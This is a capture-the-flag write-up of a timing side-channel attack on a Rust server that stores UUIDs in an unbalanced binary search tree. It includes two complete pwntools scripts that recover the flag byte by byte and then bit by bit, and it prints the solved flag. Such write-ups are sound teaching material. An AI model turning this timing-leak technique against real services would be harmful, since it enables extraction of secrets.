Tracing

NOTE: Originally published on STT's website

TL;DR

  1. Create degenerate BST (because it’s not self-balancing)
  2. Learn part of the flag based on time for search on the BST

Solution

By first looking at the files, we are provided with the source code and noticed it's Rust:

  • Cargo.toml - Build file, containing only the build options and dependencies
  • src/bst.rs - Binary Search Tree implementation
  • src/lib.rs - Defining only module bst.rs
  • src/bin/server.rs - The server who manipulates a UUID BST

We compiled it and ran it locally and found out that our request was only processed after pressing Ctrl-D. The server is started with some arguments, which we assumed to be the flag, converts them to UUIDs and stores them in a vector. Then it binds to port 1337 and waits for connections.

When it receives a request, it handles all input as a sequence of UUIDs, selecting only the valid ones and creating a BST, being the first input, the tree's root. It sends a response back with the number of UUIDs received, searchs the tree for the arguments it has been started with (in debug mode even prints if they are in the tree), and then closes the connection.

The server can output to the console some info, in debug mode. To do so, we got to this command (after a few tries and some research):

RUST_LOG=debug cargo run -- ctf{Th1s1s4Fl4g}

bst.rs is just a regular unbalanced Binary Search Tree implementation, which doesn't allow duplicate nodes.

The first attempt

We tried to find a vulnerability in the source code (especially in server.rs), because it was PWN and there could be some issues with the code. There was even a comment stating there could be conflicts due to the usage of 2 crates with modules with the same name. It was:

// Ugh, async_std::prelude::StreamExt doesn't have chunks(),
// but it conflicts with futures::stream::StreamExt for the methods it
// does have.

We went looking for the docs of each crate and found that a method that both had was used in this program, but after a little research we found it was not it, it didn't cause any issues.

A not wrong approach

After thinking a lot more, we tougth it had to be related with the BST. Since the tree is unbalanced and the connection is only closed after checking if the flag is in the tree, we could use a timing attack to find it.

The tree would have this structure:

          M
         / \
       ... ...
       /     \
      B       X
     /         \
    A           Y

The root of the tree (M) would be the our guess, then we put the branch with greater values (the one with X and Y) and then the branch with the lower values (the one with A and B). To achieve this, we first limited the chars of our guess (using knowledge from our teammates who already captured flags) to:

`0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-?!abcdefghijklmnopqrstuvwxyz_}`

Then, we assumed the flag as being in the following format: ctf{...} (because our teammates' flags were in this format), so our guess would start with ctf{. Since our guess would have to be valid UUIDs, i.e, 16 bytes long,we had to pad our guess, and since we would like to have the structure above, the padding had to be precise, so, here is the payload we thought of:

  • The guess:
    • ctf{&\xEF\xEF\xEF\xEF...}& - the char currently guessing \xEF - the byte 0xEF, because it is the halfway value among all values a byte can take
  • The greater branch:
    • ctf{&\xFF\xFF\xFF\xFF...\x00\x00}
    • ctf{&\xFF\xFF\xFF\xFF...\x00\x01}
    • ... & - the char currently guessing \xFF - the byte 0xFF, because it it he highest among all values for a byte The last 2 bytes before the } are increasing
  • The lower branch:
    • ctf{&\x00\x00\x00\x00...\x0F\xFF}
    • ctf{&\x00\x00\x00\x00...\x0F\xFE}
    • ... & - the char currently guessing \x00 - the byte 0x00, because it it he highest among all values for a byte The last 2 bytes before the } are decreasing

We chose 2 bytes to change after some trial and error, it resulted in each branch having 4096 nodes, which allowed us to more easily see the results.

Having this layout makes it so that if the guess for the current character is correct the search for the flag in the BST is fast and ends rapidly, because it only reaches the 2nd level. And if the guess is wrong it will take a long time to be found as wrong because there are 4096 nodes greater or lesser than the guess (depending on whether we guessed under or above the correct character).

This is not a very good approach since we had to run each character a few times, to get more accurate timings, and only when reaching the end could we choose the character with the lowest search time. Since we were right in front of our computers, we introduced a small optimisation which was: when we press Ctrl-C choose the character immediately and move to the next position (we did this by catching the KeybardInterrupt exception). Because we were 2, I ran the exploit with the characters in the order shown above and my teammate, @RageKnify ran it in the reversed order. We would then share with the other when we got the next character (a correct guess was 3 orders of magnitude faster than a wrong guess).

When we were halfway in our journey for the flag, my teammate guessed (correctly) the rest of the flag. We had ctf{1BitA and the flag was ctf{1BitAtATime}

Our exploit was:

#!/usr/bin/env python
from pwn import *
import time

host = 'tracing.2020.ctfcompetition.com'
port = 1337

context.log_level = 'WARN'

def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    io = connect('127.0.0.1', port)
    return io

def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = connect(host, port)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)

chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-?!abcdefghijklmnopqrstuvwxyz_}"
flag = "CTF{"
times = {}

N = 4096
LENGTH = 16
RUNS = 5

def generate_greater(cur):
    """
    Generate N 16 byte sequences greater than cur
    """
    template = cur.encode() + b"\xff" * (LENGTH - len(cur) - 2)
    assert len(template) == LENGTH - 2

    ret = b""
    for i in range(N):
        ret += template + p16(i, endian="big")

    assert len(ret)%16 == 0
    return ret

def generate_lower(cur):
    """
    Generate N 16 byte sequences lowerthan cur
    """
    template = cur.encode() + b"\x00" * (LENGTH - len(cur) - 2)
    assert len(template) == LENGTH - 2

    ret = b""
    for i in range(N - 1, -1, -1):
        ret += template + p16(i, endian="big")

    assert len(ret)%16 == 0
    return ret

def run(cur):
    io = start()

    # Send guess
    io.send(cur + "\xef" * (16 - len(cur)))

    # Send rest of the tree
    tmp = b""
    tmp += generate_greater(cur)
    tmp += generate_lower(cur)
    io.send(tmp)

    io.shutdown("send")

    # Get time to process input
    io.recv()
    tstart = time.time()
    io.recvall()
    tend = time.time()
    io.close()
    time.sleep(0.07)

    delta = tend - tstart
    return delta

while not flag.endswith("}"):
    for ch in chars:
        out = False
        cur = flag + ch

        res = []
        print("Current char: " + cur, end="\t")
        for _ in range(RUNS):
            delta = -1
            while delta == -1:
                try:
                    delta = run(cur)
                except KeyboardInterrupt:
                    out = True
                    break
                except:
                    delta = -1
            res.append(delta)
            if out:
                break

        if out:
            break

        res.sort()

        res = res[1:-1]
        avg = sum(res) / len(res)
        times[ch] = avg
        print(avg)

    minimals = []
    for _ in range(3):
        x = min(times, key=times.get)
        minimals.append((x, times[x]))
        times.pop(x)

    flag += minimals[0][0]

    # Just to get an idea of the difference
    print(minimals)
    print("------> Current Flag: " + flag + " <------")

print(flag)

He wasn't happy with this solution, because the flag said 1 bit at a time and we did it 1 byte at a time (hardcore boys xD).

He came up with a new solution (presented below) 1 bit at a time, while I was trying another challenge.

The intended solution

This solution guesses bit by bit so it only generates one side of the unbalanced BST.

#!/usr/bin/env python
from pwn import *
from Crypto.Util.number import *
import time

host = 'tracing.2020.ctfcompetition.com'
port = 1337

context.log_level = 'WARN'

def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    io = connect('127.0.0.1', port)
    return io

def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io, gdbscript=gdbscript)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)

N = 2048

def generate_greater(cur):
    ret = b""
    cur += 1
    for _ in range(N):
        ret += long_to_bytes(cur)
        cur += 1
    return ret

def run(cur):
    io = start()

    guess = long_to_bytes(cur, 16)
    io.send(guess)

    right_side = generate_greater(cur)
    io.send(right_side)

    io.shutdown("send")

    # Get time to process input
    io.recv()
    tstart = time.time()
    io.recvall()
    tend = time.time()
    io.close()
    time.sleep(0.03)

    delta = tend - tstart
    return delta

def guess(cur):
    RUNS = 5
    res = []
    for _ in range(RUNS):
        delta = -1
        while delta == -1:
            try:
                delta = run(curr)
            except KeyboardInterrupt:
                exit()
            except:
                delta = -1
        res.append(delta)
    res.sort()
    res = res[1:-1]
    avg = sum(res) / len(res)
    print('avg:', avg)
    # 0.05 was chosen after some trial and error
    return avg > 0.05

N_BITS = 16*8

# { -> 01111011
known = b"CTF{"
flag = known + b"\x00"*(16-len(known))
n = bytes_to_long(flag)

i = len(known)*8

while i < 14*8:
    print(i)
    if i % 8 == 0:
        i += 1
        continue
    # check if bit *i* should be active
    curr = n | 1 << (N_BITS - i - 1)

    if guess(curr):
        n = curr

    i += 1
    flag = long_to_bytes(n)
    print('flag:', flag)